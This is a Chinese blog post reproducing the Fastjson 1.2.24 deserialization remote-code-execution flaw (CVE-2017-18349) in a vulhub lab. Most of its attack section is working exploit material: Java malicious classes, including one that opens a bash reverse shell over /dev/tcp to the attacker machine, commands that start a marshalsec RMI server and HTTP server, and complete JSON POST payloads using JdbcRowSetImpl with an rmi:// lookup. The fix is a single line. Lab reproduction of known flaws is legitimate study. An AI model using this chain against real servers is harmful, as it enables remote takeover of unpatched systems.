Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349)

最新推荐文章于 2024-06-19 12:51:52 发布
最新推荐文章于 2024-06-19 12:51:52 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/122320196
版权

0x00 前言

最近遇到了这个漏洞,所以咱们今天来复现一下

--学如逆水行舟,不进则退

0x01 漏洞简介

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

0x02 影响版本:

fastjson <= 1.2.24

0x03 漏洞复现

1.所需机器以及工具:

靶机:Centos7 (192.168.166.129)

攻击机:kali (192.168.166.128)

本机(当然也可以用kali),用来抓包

环境:JDK不得高于不得高于1.8(使用新版本复现不出来)

marshalsec项目:用来启动一个RMI服务器,用来指定加载远程类。

下载地址:链接:https://pan.baidu.com/s/1wHGozwQsUeUSeT1dqA_Lsg 
提取码:mask

2.环境搭建

此处使用vulhub靶场搭建

cd vulhub/
cd fastjson/
cd 1.2.24-rce/
docker-compose up -d

 搭建好之后,访问靶机,http://ip:8090,出现下图,说明搭建成功

3.在kali中使用一下命令,发送一个JSON对象,更新服务端的信息。

curl http://192.168.166.129:8090/ -H "Content-Type: application/json" --data '{"name":"xzc", "age":23}'

4. 在kali中新建一个TouchFile.java文件,将下列代码内容,也就是恶意类写进文件中

注意:::此处文件名不能随意更改

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

        static {

                try {

                        Runtime rt = Runtime.getRuntime();

                        String[] commands = {"touch", "/tmp/success"};

                         Process pc = rt.exec(commands);

                         pc.waitFor();

                        } catch (Exception e) {

                        // do nothing

                }

                }

}

5.使用javac命令将TouchFile.java编译成.class文件 

注意:::编译好后,将生成的.class文件和Touchfile.java放在一个文件夹下

javac TouchFile.java

6.在Touchfile.java和.class文件的文件夹下启动http服务(默认端口是8000)

python3 -m http.server

 

 启动之后,浏览器访问http://kali ip:8000/  可以访问到就是启动成功了

7.使用marshalsec启动一个RMI服务器,用来指定加载远程类。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.166.128:8000/#TouchFile" 9999

 如下图:

 8.访问靶机,进行抓包,构造payload

注意:::  1.抓包之后,改为post包

             2.Content-Type处application/x-www-form-urlencoded换为application/json

             3.自己复现时候,记得把payload中ip改为自己攻击的ip

 

POST / HTTP/1.1
Host: 192.168.166.129:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 165

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.166.128:9999/TouchFile",
        "autoCommit":true
    }
}

发送一下数据包,响应为500,即为正常 

9.进去靶机机器(Centos7),验证命令是否执行成功

docker ps -a    ///查看启动的docker容器

docker exec -it 容器id bash

cd /tmp/

ls

发现有success,代表命令执行成功 (当然,在攻击机中,也会有回显)

10.反弹shell 

同上操作:

    1.创建一个shell.java文件,然后将shell.java编译成.class文件,然后放于同意文件夹下

代码如下:

import java.lang.Runtime;

import java.lang.Process;

public class shell {

        static {

                try {

                        Runtime rt = Runtime.getRuntime();

                        String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.166.128/6666 0>&1"}; Process pc = rt.exec(commands);

                        pc.waitFor(); }

                        catch (Exception e) {

                                 // do nothing

                                                }

                                 }

                }

         2.在shell.java和生成的.class文件夹中启动http服务

         3.启用RMI服务

 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.166.128:8000/#shell" 9999

          4nc监听6666端口 

如下图:

 11.访问靶机抓包,构造paylaod,注意项如上面一样

POST / HTTP/1.1
Host: 192.168.166.129:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 165

{

        "b":{

                "@type":"com.sun.rowset.JdbcRowSetImpl",                 "dataSourceName":"rmi://192.168.166.128:6666/shell",

                "autoCommit":true }

}

 12.出现以下图片说明反弹成功

0x04 漏洞修复:

 将Fastjson升级到最新版本

种树人1
关注
专栏目录
[渗透测试笔记] 48.Fastjson1.2.24反序列化漏洞复现(CVE-2017-18349)
H4ppyD0g的博客
03-16 2458
文章目录漏洞描述影响范围漏洞复现 漏洞描述 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCod
fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业
Ms08067安全实验室
12-08 852
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班2期学员)一、漏洞概述fastjson在解析json的过程中,支持使用@type字段来指定...
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 480
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
fastjson1.2.24 反序列化导致任意命令执行漏洞CVE-2017-18349
1ance's blog
07-24 1641
CVE-2017-18349漏洞原理 漏洞原理
Fastjson 反序列化漏洞(CVE-2017-18349)
最新发布
qq_68163788的博客
06-19 999
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson 1.2.24 反序列化导致任意命令执行漏洞CVE-2017-18349
qq_51163834的博客
06-24 838
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 900
fastjson 1.2.24 反序列化
fastjson1.2.24漏洞复现
07-27
- *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 992
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1539
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现(CVE-2017-18349
Welcome To Myon'Blog !
03-09 2371
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
漏洞复现|CVE-2017-18349FastJson1.2.24反序列化导致任意命令执行漏洞
weixin_42282189的博客
09-13 1943
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责 0x01 前言 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 0x02 影响范围 影响范围:Fastjson1.2.24及之前版本。 0x03 环境准备 3.1 目标环境 3.1.1 靶场环境 vulhub靶场环境:CVE-2017-18349 3.1.2 靶机: Ubuntu2.
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 870
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349
又菜又爱倒腾的博客
10-29 2382
#FastJson1.2.24反序列化导致任意命令执行漏洞CVE-2017-18349)# 一、漏洞简介 Pippo是一款基于Java的Web框架。FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全
fastjson 1.2.24 反序列化导致任意命令执行漏洞
weixin_62117955的博客
06-03 1078
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。注:该漏洞可以反弹shell,方法与命令执行一样,构造的payload也与命令执行的一样,这里就不展示了。应用程序,用于接收和处理客户端的远程方法调用请求,实现分布式系统中的远程通信和方法调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值